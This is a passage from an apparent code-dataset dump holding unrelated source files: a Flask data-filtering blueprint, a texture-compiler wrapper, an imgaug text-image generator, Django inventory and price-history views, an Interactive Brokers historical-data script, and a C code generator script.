Blueprint\nfrom flask_login import login_required\nfrom FlaskApp.modulo.main_utils import MainUtils\nfrom FlaskApp.mongo.entomo_crud import EntomoCrud\nfrom FlaskApp.mongo.epidem_crud import EpidemCrud\nfrom rpy2.robjects import pandas2ri\nfrom bson.json_util import dumps\nimport traceback, pandas as pd, rpy2.robjects 
as robjects, json, bisect\n\n# Metodo/Archivo:\n# filter.py\n# Descripción:\n# En este archivo están contenidos todos los servicios que el cliente pide al servidor\n# que no están relacionados directamente con la ejecución de los análisis de\n# clasificación.\n\nfilter_module = Blueprint('filter_module', __name__)\n\n# Metodo/Archivo:\n# /getMinMax\n# Descripción:\n# Retorna todas los nombres de variables numéricas de los datos entomológicos\n# ó epidemiológicos. Para cada nombre asocia el máximo y mínimo valor númerico\n# del atributo.\n# Retorno:\n#\tDatos entomológicos o epidemiológicos con mínimos y máximos.\n\n@filter_module.route(\"/getMinMax\", methods=['POST'])\n@login_required\ndef get_min_max_heads():\n data = request.get_json()\n dates = MainUtils.to_date_times(data['startDate'], data['endDate'])\n type = data['type']\n try:\n if type == \"epidem\":\n resp = {'msg':\"OK\", 'epidemMinMax': EpidemCrud.get_min_max_headers(dates)}\n elif type == \"entomo\":\n resp = {'msg':\"OK\", 'entomoMinMax': EntomoCrud.get_min_max_headers(dates)}\n return dumps(resp)\n except Exception as e:\n traceback.print_exc()\n return dumps({'msg': str(e)})\n\n# Metodo/Archivo:\n# /getClassificationByClassData\n# Descripción:\n# Obtiene los datos de la base de datos y los clasifica por los\n# factores de alguna clase seleccionada por el cliente.\n# Retorno:\n#\tEl conjunto de datos. Cada dato asociado a algún factor de la clase.\n\n@filter_module.route(\"/getClassificationByClassData\", methods=['POST'])\n@login_required\ndef get_factor_data():\n try:\n data = request.get_json()\n if len(data['projection']) == 0:\n raise Exception('NoProjection')\n bd_data = MainUtils.get_bd_data(data)\n\n pandas2ri.activate()\n bd_data = pd.DataFrame(list(bd_data))\n\n cluster_data = pd.DataFrame()\n if bd_data.size > 0:\n bd_data.rename(columns={data['selectedVariable']: 'columnFactor'}, inplace=True)\n robjects.globalenv['dataToAnalyse'] = bd_data\n levels = robjects.r(\"levels(dataToAnalyse[,'columnFactor'])\")\n cluster_data = pd.DataFrame({'columnFactor': levels, 'colorCluster': list(range(0, len(levels)))})\n bd_data = pd.merge(bd_data, cluster_data, on='columnFactor')\n bd_data.rename(columns={'columnFactor': data['selectedVariable']}, inplace=True)\n\n resp = MainUtils.json_df(bd_data)\n\n return dumps({'Rdata': {'markers': resp, 'convention': MainUtils.json_df(cluster_data),\n 'total': {len(resp)}}, 'msg': \"OK\"})\n except Exception as e:\n traceback.print_exc()\n return dumps({'msg': str(e)})\n\n# Metodo/Archivo:\n# /getClassificationByNumericData\n# Descripción:\n# Recibe una cadena con intervalos en el formato \"#,#,#...\"\n# con esto, crea un conjunto de intervalos los cuales servirán\n# para asociar los datos en función de algún atributo numérico seleccionado\n# por el cliente\n# Retorno:\n# Retorna el conjunto de intervalos y los datos asociados a cada intervalo.\n\n@filter_module.route(\"/getClassificationByNumericData\", methods=['POST'])\n@login_required\ndef get_numeric_data():\n data = request.get_json()\n numeric = data['numeric']\n bd_data = MainUtils.get_bd_data(data)\n\n bd_data = pd.DataFrame(list(bd_data))\n column = list(bd_data[numeric]) if bd_data.size > 0 else []\n\n intervals_array = sorted(list(set(map(int,data['intervals'].split(',')))))\n intervals_size = len(intervals_array)\n intervals = []\n for i in range(0,intervals_size-1):\n intervals.append({'columnFactor': '( ' + str(intervals_array[i]) + '-' + str(intervals_array[i+1]) + ' ]', 'colorCluster': i+1})\n 
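# add open-ended intervals at both ends so values outside the supplied breakpoints still map to a cluster\n    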
intervals.insert(0,{'columnFactor': '<=' + str(intervals_array[0]), 'colorCluster': 0})\n intervals.append({'columnFactor': '> ' + str(intervals_array[intervals_size-1]), 'colorCluster': intervals_size})\n\n for i in range(0,len(column)):\n bd_data.set_value(i, 'colorCluster', bisect.bisect_left(intervals_array,int(column[i])))\n\n resp = json.loads(bd_data.to_json(orient='records'))\n return dumps({'msg': \"OK\", 'Rdata': {'markers': resp, 'convention': intervals, 'total': {len(resp)}}})\n\n\n# Metodo/Archivo:\n# /initController\n# Descripción:\n# Entrega los datos iniciales al cliente.\n# Retorno:\n# Headers numéricos entomológicos y epidemiológicos\n# Niveles de cada clase\n# Headers de clases entomológicas y epidemiológicas\n\n@filter_module.route(\"/initController\", methods=['GET'])\n@login_required\ndef init_controller():\n entomo_headers = EntomoCrud.get_fac_headers()\n epidem_headers = EpidemCrud.get_fac_headers()\n entomo_distincts = {}\n epidem_distincts = {}\n for i in range(0, len(entomo_headers)):\n entomo_distincts[entomo_headers[i]] = EntomoCrud.get_distincts(entomo_headers[i])\n for i in range(0, len(epidem_headers)):\n epidem_distincts[epidem_headers[i]] = EpidemCrud.get_distincts(epidem_headers[i])\n\n init_objects = {'entomoNumHeaders': EntomoCrud.get_num_headers(),\n 'epidemNumHeaders': EpidemCrud.get_num_headers(),\n 'entomoFacHeaders': entomo_headers,\n 'epidemFacHeaders': epidem_headers,\n 'entomoClassFactors': entomo_distincts,\n 'epidemClassFactors': epidem_distincts};\n return dumps(init_objects)\n","sub_path":"Development/FlaskApp/FlaskApp/modulo/filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":5782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"55387686","text":"#! 
/usr/bin/env python\nimport os\nfrom optparse import OptionParser\n\nif __name__ == \"__main__\":\n usage = \"usage: %prog [options] infile\"\n parser = OptionParser(usage)\n parser.add_option(\"-o\", dest=\"output_file\", help=\"Output file\", metavar=\"OUTPUT\")\n (options, args) = parser.parse_args()\n if not options.output_file:\n parser.error(\"Output file not specified (-o)\")\n\n dynamo_home = os.environ[\"DYNAMO_HOME\"]\n classpath = \"%s/share/java/bob-light.jar\" % dynamo_home\n ret = os.system(\"java -cp %s com.dynamo.bob.pipeline.TextureGenerator %s %s\" % (classpath, args[0], options.output_file))\n if ret != 0:\n raise Exception(\"Failed to compile texture (%d)\" % ret)\n\n","sub_path":"engine/graphics/src/texc.py","file_name":"texc.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"176344809","text":"\"\"\"\nauthor: \"caihua\"\ndate: 2019/5/10\nEmail: hanscalcai@163.com\n\"\"\"\n\nimport random\nimport os\nimport numpy as np\nimport multiprocessing\nimport imgaug as ia\nimport imgaug.augmenters as iaa\nfrom imgaug import multicore\nfrom imgaug.augmentables.batches import Batch\nimport functools\nfrom imgaug.augmentables.batches import UnnormalizedBatch\nfrom PIL import Image, ImageDraw, ImageFont\nimport logging\nlogger = logging.getLogger()\nG = 0\n\n\ndef gen_img(label, font_color, font_size, font_path):\n try:\n font = ImageFont.truetype(font_path, font_size)\n (w, h) = font.getsize(label)\n except Exception as e:\n logger.error('can not load font: {}, ignored'.format(font_path))\n return\n bg_h = int(h * 1.2)\n bg_w = int(w + h)\n bg_img = Image.new(\"RGB\", (bg_w, bg_h), (255, 255, 255))\n draw = ImageDraw.Draw(bg_img)\n draw.text((int(0.5 * h), int(0.08 * h)), label, font=font, fill=font_color)\n img_array = np.array(bg_img).astype(np.uint8)\n return img_array\n\n\ndef gen_img_helper(args):\n return gen_img(*args)\n\n\nclass ImageGenerator(object):\n \n def __init__(self, char_list, raw_choose_num=None, aug_choose_num=None,\n choose_ratio=0.5, aug_ratio=0.2, font_path_list=[], font_dir=None, cores=4):\n \"\"\"\n \n :param char_list:\n :param raw_choose_num: choose the num of raw generate images\n :param aug_choose_num: 最终得到的增强图片的数量\n :param aug_ratio:\n :param font_path_list:\n :param font_dir:\n :param cores:\n \"\"\"\n self.char_list = char_list\n logger.info('prepare char len:{}'.format(len(self.char_list)))\n assert len(font_path_list) > 0 or font_dir is not None\n if font_dir is not None:\n self.font_path_list = [os.path.join(font_dir, font_name) for font_name in os.listdir(font_dir) \\\n if len(font_name.rsplit('.', 1)) > 1 and font_name.rsplit('.', 1)[1] not \\\n in ['ttf', 'otf'] and not font_name.startswith('.')]\n else:\n self.font_path_list = font_path_list\n logger.info('font sum:{}'.format(len(self.font_path_list)))\n logger.info('prepare generate img sum:{}'.format(len(self.char_list) * len(self.font_path_list)))\n self.raw_choose_num = raw_choose_num\n self.aug_choose_num = aug_choose_num\n self.choose_ratio = choose_ratio\n self.aug_ratio = aug_ratio\n self.cores = cores\n sometimes = lambda aug: iaa.Sometimes(aug_ratio, aug)\n self.seq = iaa.Sequential(\n [\n sometimes(iaa.CropAndPad(\n percent=(-0.05, 0.1),\n pad_mode=ia.ALL,\n pad_cval=(0, 255)\n )),\n sometimes(iaa.Affine(\n scale={\"x\": (0.8, 1.2), \"y\": (0.8, 1.2)},\n translate_percent={\"x\": (-0.1, 0.1), \"y\": (-0.05, 0.05)},\n rotate=(-5, 5),\n shear=(-3, 3),\n order=[0, 1],\n cval=(0, 255),\n 
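# ia.ALL lets imgaug pick the fill mode randomly per image\n                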
mode=ia.ALL\n )),\n # execute 0 to 5 of the following augmenters per image\n iaa.SomeOf((0, 5),\n [\n iaa.OneOf([\n iaa.GaussianBlur((0, 0.5)),\n iaa.AverageBlur(k=(1, 3)),\n iaa.MedianBlur(k=(1, 3)),\n iaa.Dropout(p=0.05),\n iaa.CoarseDropout(p=0.05, size_percent=0.20),\n iaa.Salt(p=0.03),\n iaa.GammaContrast(gamma=0.81),\n iaa.Emboss(alpha=1, strength=0.5)\n ]),\n ],\n random_order=True\n )\n ],\n random_order=True\n )\n self.raw_img_dict = {}\n self.aug_imgs = []\n\n def clear(self):\n self.raw_img_dict = {}\n self.aug_imgs = []\n\n def gen_images(self):\n \"\"\"\n :return: 参数列表,形成的图片列表\n \"\"\"\n font_size = 20\n font_color = (0, 0, 0)\n args_list = []\n for font_id, font_path in enumerate(self.font_path_list):\n for label_id, label in enumerate(self.char_list):\n args_list.append([label, font_color, font_size, font_path])\n logger.info('begin generate bg img')\n if self.cores <= 1:\n bg_imgs = [gen_img(*arg) for arg in args_list]\n else:\n pool = multiprocessing.Pool(processes=int(self.cores))\n bg_imgs = pool.map(gen_img_helper, args_list)\n pool.close()\n pool.join()\n logger.info('success generate all bg img')\n return [args_list[i] + [bg_imgs[i]] for i in range(len(args_list))]\n \n def choose_raw_img(self, args_img_list):\n valid_args_img_list = [args_img for args_img in args_img_list if args_img[-1] is not None]\n raw_choose_num = int(len(args_img_list) * self.choose_ratio) if self.raw_choose_num is None \\\n else min(self.raw_choose_num, len(args_img_list) * self.choose_ratio)\n logger.info('choose raw img sum:{}'.format(raw_choose_num))\n raw_args_img_list = random.sample(valid_args_img_list, raw_choose_num)\n raw_imgs_list = []\n for i, raw_args_img in enumerate(raw_args_img_list):\n label, font_color, font_size, font_path, img = raw_args_img\n img_name = '{}_raw.jpg'.format(i)\n self.raw_img_dict[img_name] = {\"img\": img, \"label\": label, \"font_size\": font_size,\n \"font_color\": font_color, \"font_path\": font_path}\n raw_imgs_list.append(img)\n return raw_imgs_list\n \n def aug_img(self, args_img_list):\n logger.info('begin generate aug img')\n if self.cores <= 1:\n img_list = [args_img[-1] for args_img in args_img_list if args_img[-1] is not None]\n image_aug_list = self.seq.augment_images(img_list)\n else:\n img_args_list_copy = args_img_list.copy()\n char_sum = len(self.char_list)\n c = 0\n batches = []\n batch_imgs = []\n while img_args_list_copy:\n label, font_color, font_size, font_path, img = img_args_list_copy.pop(0)\n if img is not None:\n batch_imgs.append(img)\n c += 1\n if c == char_sum:\n if len(batch_imgs) > 0:\n batch = Batch(batch_imgs)\n batches.append(batch)\n c = 0\n batch_imgs = []\n seq_pool = multicore.Pool(self.seq, processes=self.cores)\n gen_img_batches = seq_pool.map_batches(batches, chunksize=4)\n seq_pool.close()\n seq_pool.join()\n image_aug_list = []\n for gen_img_batch in gen_img_batches:\n image_aug_list.extend(gen_img_batch.images_unaug)\n logger.info('success generate aug img')\n return image_aug_list\n","sub_path":"img_generator.py","file_name":"img_generator.py","file_ext":"py","file_size_in_byte":7287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"524051614","text":"\nimport datetime\n\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.views.generic import (CreateView, ListView, UpdateView, View,\n DetailView, TemplateView)\nfrom django.contrib import messages\nfrom django.contrib.messages.views import SuccessMessageMixin\nfrom django.shortcuts import 
render\n\nfrom .models import Articulo, HistorialPreciosCompra, HistorialPreciosVenta\nfrom .forms import ArticuloForm, ArticuloDeleteForm, MarcaForm, RubroForm, \\\n ActualizacionPrecioForm\n\nfrom .helpers import DibujarBarcode\nfrom . import helpers\n\n\nclass ArticuloCreateView(SuccessMessageMixin, CreateView):\n\n model = Articulo\n form_class = ArticuloForm\n success_url = '/articulos/alta'\n success_message = 'El Árticulo fue creado con éxito'\n\n def get_context_data(self, **kwargs):\n context = super(ArticuloCreateView, self).get_context_data(**kwargs)\n context['marca_form'] = MarcaForm\n context['rubro_form'] = RubroForm\n return context\n\n def form_valid(self, form):\n return super(ArticuloCreateView, self).form_valid(form)\n\n def form_invalid(self, form):\n messages.error(self.request, 'El formulario contiene errores')\n return super(ArticuloCreateView, self).form_invalid(form)\n\n def get_success_url(self):\n return self.success_url\n\n\nclass ArticuloListView(ListView):\n\n queryset = Articulo.objects.filter(baja=False)\n paginate_by = 6\n\n def get_queryset(self):\n qs = Articulo.objects.filter(baja=False)\n if 'texto_buscar' in self.request.GET:\n if self.request.GET.get('texto_buscar') is not '':\n texto_buscar = self.request.GET.get('texto_buscar')\n qs = helpers.buscar_codigo(texto_buscar)\n qs = helpers.buscar_descripcion(qs, texto_buscar)\n qs = helpers.buscar_precio_venta(qs, texto_buscar)\n qs = helpers.buscar_precio_compra(qs, texto_buscar)\n qs = helpers.buscar_stock(qs, texto_buscar)\n qs = helpers.buscar_stock_minimo(qs, texto_buscar)\n qs = helpers.buscar_fecha_compra(qs, texto_buscar)\n return qs\n\n\nclass ArticuloUpdateView(SuccessMessageMixin, UpdateView):\n\n model = Articulo\n form_class = ArticuloForm\n success_url = '/articulos/listado/'\n success_message = 'El Árticulo se modifico con éxito'\n\n def get_context_data(self, **kwargs):\n context = super(ArticuloUpdateView, self).get_context_data(**kwargs)\n context['marca_form'] = MarcaForm\n context['rubro_form'] = RubroForm\n return context\n\n def form_valid(self, form):\n articulo = Articulo.objects.get(pk=self.kwargs['pk'])\n historial_precio_venta = HistorialPreciosVenta(articulo=articulo,\n fecha_modificacion=datetime.datetime.now(),\n precio=\n form.data['precio_venta'])\n historial_precio_venta.save()\n historial_precio_compra = HistorialPreciosCompra(articulo=articulo,\n fecha_modificacion=datetime.datetime.now(),\n precio=\n form.data[\n 'precio_compra'])\n\n historial_precio_compra.save()\n return super(ArticuloUpdateView, self).form_valid(form)\n\n\nclass ArticuloDeleteView(View):\n\n def get(self, request, *args, **kwargs):\n\n articulo_delete_form = ArticuloDeleteForm()\n object = Articulo.objects.get(pk=self.kwargs['pk'])\n return render(self.request, 'articulos/articulo_confirm_delete.html',\n {'form': articulo_delete_form,\n 'articulo': object})\n\n def post(self, request, *args, **kwargs):\n\n articulo = Articulo.objects.get(pk=self.kwargs['pk'])\n articulo_delete_form = ArticuloDeleteForm(instance=articulo,\n data=self.request.POST)\n if articulo_delete_form.is_valid():\n articulo_delete_form.instance.fecha_baja = \\\n datetime.datetime.now().date()\n articulo_delete_form.instance.baja = True\n articulo_delete_form.save()\n messages.error(request, 'El árticulo fue eliminado '\n 'de forma correcta')\n return HttpResponseRedirect('/articulos/listado/')\n\n\nclass ArticuloDetailView(DetailView):\n\n model = Articulo\n template_name = 'articulos/articulo_detail.html'\n\n\ndef 
barcode(request, pk):\n\n articulo = Articulo.objects.get(pk=pk)\n d = DibujarBarcode(articulo.codigo_barra)\n binaryStuff = d.asString('gif')\n return HttpResponse(binaryStuff, 'image/gif')\n\n\nclass ActualizarPrecioTemplateView(TemplateView):\n\n template_name = 'articulos/articulo_actualizar_precios.html'\n\n def get_context_data(self, **kwargs):\n context = super(ActualizarPrecioTemplateView, self)\\\n .get_context_data(**kwargs)\n context['form'] = ActualizacionPrecioForm()\n return context\n\n def post(self, request, *args, **kwargs):\n busqueda = {}\n form_articulo_actualizar = ActualizacionPrecioForm(data=\n self.request.POST)\n if form_articulo_actualizar.is_valid():\n if 'rubro' in form_articulo_actualizar.data:\n if form_articulo_actualizar.data['rubro'] != '':\n busqueda['rubro__id'] = form_articulo_actualizar.data['rubro']\n if 'marca' in form_articulo_actualizar.data:\n if form_articulo_actualizar.data['marca'] != '':\n busqueda['marca__id'] = form_articulo_actualizar.data['marca']\n if 'codigo_desde' in form_articulo_actualizar.data:\n if form_articulo_actualizar.data['codigo_desde'] != '':\n busqueda['codigo_barra__lte'] = \\\n form_articulo_actualizar.data['codigo_desde']\n if 'codigo_hasta' in form_articulo_actualizar.data:\n if form_articulo_actualizar.data['codigo_hasta'] != '':\n busqueda['codigo_barra__gte'] = \\\n form_articulo_actualizar.data['codigo_hasta']\n articulos = Articulo.objects.filter(**busqueda)\n\n if 'variacion' in form_articulo_actualizar.data:\n if form_articulo_actualizar.data['variacion'] == 'costo':\n\n if 'moneda' in form_articulo_actualizar.data:\n if form_articulo_actualizar.data['moneda'] == 'pesos':\n for articulo in articulos:\n resultado = str(int(articulo.precio_compra) +\n int(form_articulo_actualizar.\n data['numero']))\n\n historial_precio_compra = HistorialPreciosCompra(\n articulo=articulo,\n fecha_modificacion=datetime.datetime.now(),\n precio=articulo.precio_compra)\n historial_precio_compra.save()\n\n articulo.precio_compra = resultado\n articulo.save()\n else:\n\n for articulo in articulos:\n aumento = (int(articulo.precio_compra) *\n int(form_articulo_actualizar.\n data['numero']))/100\n resultado = int(articulo.precio_compra) +\\\n int(aumento)\n\n historial_precio_compra = HistorialPreciosCompra(\n articulo=articulo,\n fecha_modificacion=datetime.datetime.now(),\n precio=articulo.precio_compra)\n historial_precio_compra.save()\n\n articulo.precio_compra = resultado\n articulo.save()\n\n else:\n if 'moneda' in form_articulo_actualizar.data:\n if form_articulo_actualizar.data['moneda'] == 'pesos':\n\n for articulo in articulos:\n resultado = str(int(articulo.precio_venta) + \\\n int(form_articulo_actualizar.data[\n 'numero']))\n\n historial_precio_venta = HistorialPreciosVenta(\n articulo=articulo,\n fecha_modificacion=datetime.datetime.now(),\n precio=articulo.precio_venta)\n historial_precio_venta.save()\n\n articulo.precio_venta = resultado\n articulo.save()\n else:\n for articulo in articulos:\n aumento = (int(articulo.precio_venta) *\n int(form_articulo_actualizar.\n data['numero'])) / 100\n resultado = int(articulo.precio_venta) + \\\n int(aumento)\n\n historial_precio_venta = HistorialPreciosVenta(\n articulo=articulo,\n fecha_modificacion=datetime.datetime.now(),\n precio=articulo.precio_venta)\n historial_precio_venta.save()\n\n articulo.precio_venta = resultado\n articulo.save()\n\n messages.success(self.request, 'El precio del Árticuo se '\n 'actualizo')\n return 
HttpResponseRedirect('/articulos/actualizar/precios/')\n else:\n return render(self.request,\n 'articulos/articulo_actualizar_precios.html',\n {'form': form_articulo_actualizar})\n\n\nclass HistorialPreciosVentaListView(ListView):\n\n model = HistorialPreciosVenta\n template_name = 'articulos/historial_precio_venta.html'\n paginate_by = 20\n\n\nclass HistorialPreciosCompraListView(ListView):\n\n model = HistorialPreciosCompra\n template_name = 'articulos/historial_precio_compra.html'\n paginate_by = 20\n\n\nclass ArticuloListPrint(ListView):\n\n queryset = Articulo.objects.filter(baja=False)\n template_name = 'articulos/articulo_list_print.html'\n\n\nclass EtiquetasGondolaTemplateView(ListView):\n\n queryset = Articulo.objects.filter(baja=False)\n template_name = 'articulos/articulos_list_etiquetas.html'\n paginate_by = 10\n\n def get_queryset(self):\n qs = []\n if 'texto_buscar' in self.request.GET:\n if self.request.GET.get('texto_buscar') is not '':\n texto_buscar = self.request.GET.get('texto_buscar')\n qs = helpers.buscar_codigo(texto_buscar)\n qs = helpers.buscar_descripcion(qs, texto_buscar)\n qs = helpers.buscar_precio_venta(qs, texto_buscar)\n qs = helpers.buscar_precio_compra(qs, texto_buscar)\n qs = helpers.buscar_stock(qs, texto_buscar)\n qs = helpers.buscar_stock_minimo(qs, texto_buscar)\n qs = helpers.buscar_fecha_compra(qs, texto_buscar)\n if len(qs) == 0:\n qs = Articulo.objects.filter(rubro__descripcion=texto_buscar)\n return qs\n","sub_path":"apps/articulos/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"63376676","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Nov 24 03:20:55 2020\n\n@author: boo\n\"\"\"\n\nfrom ibapi.client import EClient\nfrom ibapi.wrapper import EWrapper\nfrom ibapi.contract import Contract\nimport threading\nimport time\n\nimport pandas as pd\n\nclass TradingApp(EWrapper, EClient): \n def __init__(self):\n EClient.__init__(self,self) \n self.data={} \n \n \n def historicalData(self, reqId, bar):\n if reqId not in self.data:\n self.data[reqId]=[{\n \"Date\": bar.date,\n \"Open\": bar.open,\n \"High\": bar.high,\n \"Low\": bar.low,\n \"Close\":bar.close,\n \"Volume\":bar.volume,\n }]\n else:\n self.data[reqId].append({\n \"Date\": bar.date,\n \"Open\": bar.open,\n \"High\": bar.high,\n \"Low\": bar.low,\n \"Close\":bar.close,\n \"Volume\":bar.volume,\n })\n print(self.data)\n\n\ndef nse_contract(symbol):\n contract=Contract()\n contract.symbol=symbol\n contract.secType = \"STK\"\n contract.exchange = \"NSE\" \n contract.currency = \"INR\" \n return contract\n\n\ndef histData(req_num,contract, durationStr='1 M',barSizeSetting='1 day'):\n app.reqHistoricalData (reqId=req_num,\n contract=contract,\n endDateTime='',\n durationStr=durationStr, \n barSizeSetting=barSizeSetting,\n whatToShow='ADJUSTED_LAST',\n useRTH=0,\n formatDate=1,\n keepUpToDate=0,\n chartOptions=[],)\n \ndef websocket_conn():\n app.run()\n \napp=TradingApp()\napp.connect(\"127.0.0.1\", 7497, clientId=1) \n\ncon_thread=threading.Thread(target=websocket_conn, daemon=True)\ncon_thread.start()\ntime.sleep(1)\n\ntickers=['SAIL',\t'SIEMENS','FORTIS', \t'NIFTYBEES']\ndf_dict={}\n\n\nfor ticker in tickers:\n contract=nse_contract(ticker)\n histData(tickers.index(ticker),contract)\n time.sleep(5)\n \n df_dict[ticker]=pd.DataFrame(app.data[tickers.index(ticker)])\n df_dict[ticker].set_index(\"Date\", inplace=True)\n \n\n \n 
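\n# Illustrative sketch, not part of the original script: persist the downloaded\n# bars and close the API session. Assumes df_dict was filled by the loop above;\n# the CSV file names are hypothetical.\nfor ticker in df_dict:\n    df_dict[ticker].to_csv('{}_daily_bars.csv'.format(ticker))\napp.disconnect()\n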
","sub_path":"IBKR/4_5_iterativr_data.py","file_name":"4_5_iterativr_data.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"579471500","text":"import sys\n\nfrom jinja2 import Template\n\ndef gen_mask(end):\n mask = 0\n for j in range(16):\n # current bit is 0 indicating passive nibble\n if end % 2 == 0:\n mask |= 15 << (4*j)\n end >>= 1\n return '{0:#x}'.format(mask)\n\ndef gen_logic(diff):\n lines = []\n for i in range(16):\n if diff % 2 == 1:\n lines.append(\"(a >> {0} & 0xF) != (b >> {0} & 0xF) &&\".format(4*i))\n\n diff >>= 1\n\n if len(lines) == 0:\n return \"return 1;\"\n\n lines[-1] = lines[-1][:-3]\n combined = \"\\n\".join([\" {}\".format(line) for line in lines])\n return \" return (\\n{}\\n );\".format(combined)\n\ndef gen_passive_logic(start):\n hex_str = \"{:04X}\".format(start)\n lines = []\n total_bits = 64 - 4 * bin(start).count(\"1\")\n num_bits = total_bits\n for i in range(4):\n line = \"pt[{}] = \".format(i)\n\n c = hex_str[i]\n if c == '0':\n line += \"i >> {} & 0xFFFF\".format(num_bits - 16)\n num_bits -= 16\n elif c == '1':\n line += \"(i >> {} & 0xFFF) << 4\".format(num_bits - 12)\n num_bits -= 12\n elif c == '2':\n line += \"((i >> {} & 0xFF) << 8) | (i >> {} & 0xF)\".format(num_bits - 8, num_bits - 12)\n num_bits -= 12\n elif c == '3':\n line += \"i >> {} & 0xFF << 8\".format(num_bits - 8)\n num_bits -= 8\n elif c == '4':\n line += \"((i >> {} & 0xF) << 12) | (i >> {} & 0xFF)\".format(num_bits - 4, num_bits - 12)\n num_bits -= 12\n elif c == '5':\n line += \"((i >> {} & 0xF) << 12) | ((i >> {} & 0xF) << 4)\".format(num_bits - 4, num_bits - 8)\n num_bits -= 8\n elif c == '6':\n line += \"((i >> {} & 0xF) << 12) | (i >> {} & 0xF)\".format(num_bits - 4, num_bits - 8)\n num_bits -= 8\n elif c == '7':\n line += \"(i >> {} & 0xF) << 12\".format(num_bits - 4)\n num_bits -= 4\n elif c == '8':\n line += \"i >> {} & 0xFFF\".format(num_bits - 12)\n num_bits -= 12\n elif c == '9':\n line += \"(i >> {} & 0xFF) << 4\".format(num_bits - 8)\n num_bits -= 8\n elif c == '10':\n line += \"((i >> {} & 0xF) << 8) | (i >> {} & 0xF)\".format(num_bits - 4, num_bits - 8)\n num_bits -= 8\n elif c == '11':\n line += \"(i >> {} & 0xF) << 8\".format(num_bits - 4)\n num_bits -= 4\n elif c == '12':\n line += \"i >> {} & 0xFF\".format(num_bits - 8)\n num_bits -= 8\n elif c == '13':\n line += \"(i >> {} & 0xF) << 4\".format(num_bits - 4)\n num_bits -= 4\n elif c == '14':\n line += \"i >> {} & 0xF\".format(num_bits - 4)\n num_bits -= 4\n elif c == '15':\n line += \"0\"\n\n line += \";\"\n lines.append(line)\n\n return \"\\n\".join([\" {}\".format(line) for line in lines])\n\ndef gen_start_active_logic(start):\n hex_str = \"{:4X}\".format(start).replace(\" \", \"0\")\n lines = []\n num_active = bin(start).count(\"1\")\n num_vars = num_active\n\n lines.append(\"uint16_t {};\".format(\n \", \".join(\n \"i{}\".format(i) for i in range(num_active)\n )\n ))\n for i in range(num_active):\n lines.append(\"for (i{0} = 0; i{0} < 16; ++i{0})\".format(i) + \" {\")\n\n for i in range(4):\n c = int(hex_str[i])\n\n if c == 0:\n continue\n\n tmp = c\n mask = 0\n for j in range(4):\n # current bit is 0 indicating passive nibble\n if tmp % 2 == 0:\n mask |= 15 << (4*j)\n tmp >>= 1\n line = 'pt[{}] &= {:#x};'.format(i, mask)\n lines.append(line)\n\n line = \"pt[{}] |= \".format(i)\n j = num_active - num_vars\n if c == 1:\n line += \"i{}\".format(j)\n num_vars -= 1\n elif c == 2:\n line += \"i{} << 4\".format(j)\n 
num_vars -= 1\n elif c == 3:\n line += \"(i{} << 4) | i{}\".format(j, j+1)\n num_vars -= 2\n elif c == 4:\n line += \"i{} << 8\".format(j)\n num_vars -= 1\n elif c == 5:\n line += \"(i{} << 8) | i{}\".format(j, j+1)\n num_vars -= 2\n elif c == 6:\n line += \"(i{} << 8) | (i{} << 4)\".format(j, j+1)\n num_vars -= 2\n elif c == 7:\n line += \"(i{} << 8) | (i{} << 4) | i{}\".format(j, j+1, j+2)\n num_vars -= 3\n elif c == 8:\n line += \"i{} << 12\".format(j)\n num_vars -= 1\n elif c == 9:\n line += \"(i{} << 12) | i{}\".format(j, j+1)\n num_vars -= 2\n elif c == 10:\n line += \"(i{} << 12) | (i{} << 4)\".format(j, j+1)\n num_vars -= 2\n elif c == 11:\n line += \"(i{} << 12) | (i{} << 4) | i{}\".format(j, j+1, j+2)\n num_vars -= 3\n elif c == 12:\n line += \"(i{} << 12) | (i{} << 8)\".format(j, j+1)\n num_vars -= 2\n elif c == 13:\n line += \"(i{} << 12) | (i{} << 8) | i{}\".format(j, j+1, j+2)\n num_vars -= 3\n elif c == 14:\n line += \"(i{} << 12) | (i{} << 8) | (i{} << 4)\".format(j, j+1, j+2)\n num_vars -= 3\n elif c == 15:\n line += \"(i{} << 12) | (i{} << 8) | (i{} << 4) | i{}\".format(j, j+1, j+2, j+3)\n num_vars -= 4\n line += \";\"\n lines.append(line)\n\n return \"\\n\".join([\" {}\".format(line) for line in lines])\n\ndef gen_id_active_logic(start):\n hex_str = \"{:4X}\".format(start)\n num_active = bin(start).count(\"1\")\n return(\" | \".join(\n \"i{} << {}\".format(i, 4 * (num_active - i - 1)) for i in range(num_active)\n )\n )\n\ndef gen_end_active_logic(start):\n hex_str = \"{:4X}\".format(start)\n num_active = bin(start).count(\"1\")\n lines = []\n for i in range(num_active):\n lines.append(\"}\")\n return \"\\n\".join([\" {}\".format(line) for line in lines])\n\ndef main():\n if len(sys.argv) < 3:\n print(\"usage: {} [start] [end0] [end1] [end2] ...\".format(sys.argv[0]))\n sys.exit(1)\n\n start = int(sys.argv[1])\n ends = [int(i) for i in sys.argv[2:]]\n\n masks = {}\n logics = {}\n logics[start] = gen_logic(start)\n for end in ends:\n masks[end] = gen_mask(end)\n logics[end] = gen_logic(end)\n\n passive_logic = gen_passive_logic(start)\n start_active_logic = gen_start_active_logic(start)\n id_active_logic = gen_id_active_logic(start)\n end_active_logic = gen_end_active_logic(start)\n\n with open('gen_pairs.c.jinja') as f:\n tmpl = Template(f.read())\n\n info = {\n \"start\": start,\n \"ends\": ends,\n \"num_active\": bin(start).count(\"1\"),\n \"masks\": masks,\n \"logics\": logics,\n \"passive_logic\": passive_logic,\n \"start_active_logic\": start_active_logic,\n \"id_active_logic\": id_active_logic,\n \"end_active_logic\": end_active_logic\n }\n print(tmpl.render(**info))\n\nif __name__ == \"__main__\":\n 